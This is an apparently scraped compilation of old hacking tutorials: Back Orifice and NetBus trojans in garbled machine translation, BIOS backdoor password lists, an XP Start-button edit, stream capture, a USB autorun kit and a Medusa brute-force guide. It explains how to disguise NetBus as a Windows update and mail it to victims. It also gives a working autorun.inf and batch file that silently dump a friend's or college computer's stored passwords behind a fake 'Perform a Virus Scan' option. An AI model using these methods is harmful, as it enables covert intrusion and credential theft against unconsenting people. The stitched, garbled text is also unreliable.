TROJANS

Trojan horses bake Orifice and NetBus.

Bake Orifice: The American group of hackers of Cult OF The DEAD Cow (HTTP: www. cultdeadcow. com) a program with the name published "bakes Orifice", which calls it "remote maintenance tool for networks". The fact that the intention is another results already from the name: Bake Orifice (rear opening) translates one here best with "back door", because the program makes it nearly the children's game to drive Schindluder with Windows PCS. Funny the allusion on MicroSoft's "bake Office" system.

Only 124 KByte the large "server module" can to any Windows EXE program be coupled, in order to put underneath it nothing-suspecting users. If the file under Windows 95 or 98 is implemented, the server latches itself quasi invisibly in the system. Of this moment on the Trojan horse waits only for over UDP minutes to be waked.

With the Client leave yourself comfortably on strike computers to access. Among other things one can manipulate the file system (files to down-load, magnify the importance of etc.. tasks terminate, uvm. The function mode bake Orifice is already from other hacker Tools well-known; the convenient operation of the graphic "maintenance component" is new primarily -- few inputs and Mausklicks are sufficient to manipulate in order to terminate processes to log keyboard entries the Windows Registry or reroute IP addresses.

One finds an interesting practice report under the German address check this out.

or

this one also

In order to examine your system on an existing bake Office, there are programs such as BoDetect, (hitp: www. spiritone. coni/ cbenson/current_projects/backorificefbaekorifice. htm) or the program Borf D (HTTP: www. st-Andrew. AC. uk/ sjs/boredfbored. HTML) It is manually very simple in addition, bakes Orifice to remove: Open the Registry (regedit.exe implement) and look under the key

HKEY LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

after an entry with the name ". exe "(default file name) and/or. with an entry long 124.928 (+/- 30 bytes). Delete this entry; it causes that "bake Orifice" servers. with each Windows start one activates automatically.

The program lies generally in the listing "\Windows\System" and is recognizable from the fact that it does not have a program Icon and a size of 122 KByte (or slightly more) possesses. If you should not find the file for any reasons, it can help you that different information is to be found as ASCII stringer in the Prgramrn code; like that the character string is contained "bofilernappingcon" with large probability, which you will find over search in the Explorer.

Additionally to "bake Orifice Prgramm Datel" becomes in the same listing still the "WINE)LL. DLL "to the rnitloggen of keyboard entries installs, which delete you also meaningful way, which can cause however alone no damage.

The problem with bake Orifice is that it is difficult to explore the IP address of the host since this changes when each a selecting the stricken computer. This problem solved, and a still more powerful solution created Carl Fredrik Neikter with its program "Netssus", which is quite similar. It offers still larger functions and is simpler to install.



NetBus:

After you hemngergeladen yourselves the appropriate file have, you should unpack these. Now you receive to three files: NETBUS. EXE, NETBUS. Rtf and PATCH. EXE

With PATCH. EXE concerns it the dangerous lnfizierungsprogramrn, the actual Trojan horse. Do not start this file thus! D IE file NETBUS. Rtf contains a short English guidance the Authors. The file NETBUS. EXE is the "Client" with that you infected servers to access can. These can start you without concerns. Start for testing the server on your own computer, by opening a DOS request for input and starting in the listing of NetBus the server with the parameter, Jnoadd ", thus PATCH. EXE/noadd [ RETURN ]

Now the server runs. Now you can start the Client (NETBUS.EXE doppelelicken) access and your own computer '. Select in addition as address "local host" or "127. 0.0. 1 "if you the server terminate wohlen, select you irn Client"Server Admin" and then "CLOSE server".

In addition the infecting program can be changed in such a way the fact that it sends automatically the IP address to one of them selected to email address as soon as with one of NetBus infected someone computers into the InterNet goes. This is the enormous advantage against-practices r bakes Orifice. In addition one selects the Button "server Setup" in the NetBus Client and enters the appropriate information. Difficult it is only to find a free Mail server the Mails of each IP address accepts. Then one selects "Patch Srvr" and selects the too patchende Infiziemngsdatei (standard massive "patch. exe").

Who tries to infect another computer the file PATCH can. EXE now simply by email to another more lnternetnutzer send and the file "Windows updates" or than any mad merry Anirnation call. The file can be renamed to it at will (z.b. Win98update. exe or siedler2_patch. exe etc.. ). If the file is now started, optically nothing happens. However the NeiBus server installed itself already on the computer hidden and from now on automatisc ' was started each time, if the computer is gebootet.

If one made above changes to lnfizierungsprogramm, one gets now always automatically email with the IP address of the infected computer, as soon as this on-line goes into the InterNet. This You can enter IP address now in the Netssus Client and manipulate the computer.

Hackers use for safety's sake anonymous email addresses, it for example with holmail. com or maii. com gives.

In order to protect your system, Norton is recommended anti-virus HTTPwhich beside NetBus bake Orifice recognizes. They can work also again manually. That automatic NetBus start is registered in the Registry under

"HKEY LOCAL MACHINESOFTWARF, \Microsoft\Windows\CurrentVersion\Run"

and should be removed. However the file name can vary (patch.exe, sysedit. exe or explore. exe are some well-known names)

How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER

This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. I am not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS.

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.

Backdoor passwords.

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords.

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222 589589 589721 595595 598598.

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer	Password
VOBIS & IBM	merlin
Dell	Dell
Biostar	Biostar
Compaq	compaq
Enox	xo11nE
Epox	central
Freetech	posterie
IWill	iwill
Jetway	spoom1
Packerd Bell	bell
QDI	QDI
Siemens	SKY_FOX
TMC	BIGO
Toshiba	toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1, !BIOS (get the how-to article), RemPass, KILLCMOS.

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.

Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.

Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

BYPASS INTERNET CENSORSHIP.

READ THE BOOK AT BYPASS Internet censorship

Hack xp

Change text on XP Start Button

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.

Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

Download any streaming file

HOW TO CAPTURE STREAMING MEDIA.

many websites (http://ww.smashits.com) stream songs and videos people believe they cannot be downloaded, quite why i dont know. they kinda think there is no file present to dwnld

once the file is located it can then be retrieved by nettransport nettransport is able to dwnld any file whether ftp or rtsp etc.

1. Download Project URL Snooper 1.02.01 from http://rain66.at.infoseek.co.jp/
2. Install URL Snooper (and WinPcap together)
3. Don't run URL Snooper when it is done installing
4. Restart computer
5. Open Project URL Snooper
6. Click on the General Options Tab
7. user posted image
8. Chose a network adapter
9. Now click on the search tab
10. Click Sniff Network
11. Go to a webpage and you should see some results in the results list
12. If nothing is appearing then chose another network adapter, until one works
13. Now you are ready to begin searching
14. Click the "Hide Non-Streaming URLs" option to hide all http:// references and only show URLs corresponding to streaming audio/video (rtsp, pnm, wma, etc.)
15. Then click Sniff Network
16. Your links should appear as you begin streaming your file
17. Select your desired stream user posted image
18. usually rm file user posted image
19. On the bottom there should be the link which you simply copy user posted image
20. Download nettransport from here :
    
    ftp://down_transport:123@s1.5fox.com/NT2Setup_multi.EXE or
    
    ftp://nettransport:nettransport@61.153.24...Setup_multi.EXE
    
    http://lycos26486.l97.lycos.com.cn/download.htm
    
    Or Just google it.
21. Install it
22. Click on new
23. Paste link

now you should be able to download any file if u need ne help jus ask i think dialups may have problems

Hack your friends password

How to hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.

We need the following tools to create our rootkit:

MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView :Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview :IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView:Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox:PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit: NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
   
   ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it:
   
   [autorun]
   
   open=launch.bat
   
   ACTION= Perform a Virus Scan
   
   save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
   
   start mspass.exe /stext mspass.txt
   
   start mailpv.exe /stext mailpv.txt
   
   start iepv.exe /stext iepv.txt
   
   start pspv.exe /stext pspv.txt
   
   start passwordfox.exe /stext passwordfox.txt
   
   

save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE:This procedure will only recover the stored passwords (if any) on the Computer.

BACKTRACK TUTORIALS

Exploitation

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.

Medusa comes installed on Backtrack 5. However, if you are using a different version of backtrack without Medusa type:

apt-get update

apt-get install medusa

When using online password crackers, the potential for success can be greatly

increased if you combine this attack with information gathered from reconnaissance and scanning. An example of this is when you find usernames, passwords, and email addresses. Programs like Medusa will take a username and password list and keep guessing until it uses all the passwords. Be aware that some remote access systems employ a password throttling technique that can limit the number of unsuccessful log-ins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.

Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:

/pentest/passwords/wordlists/

n order to execute the brute-force attack, you open a terminal and type the following:

medusa –h target_ip –u username –P path_to_password_dictionary –M service_to_attack

“-h” is used to specify the IP address of the target host. The “-u” is used for a single username that Medusa will use to attempt log-ins. “-P” is used to specify an entire list containing multiple passwords. The “-P” needs to be followed by the actual location or path to the dictionary file. The “-M” switch is used to specify which service we want to attack.

More to come!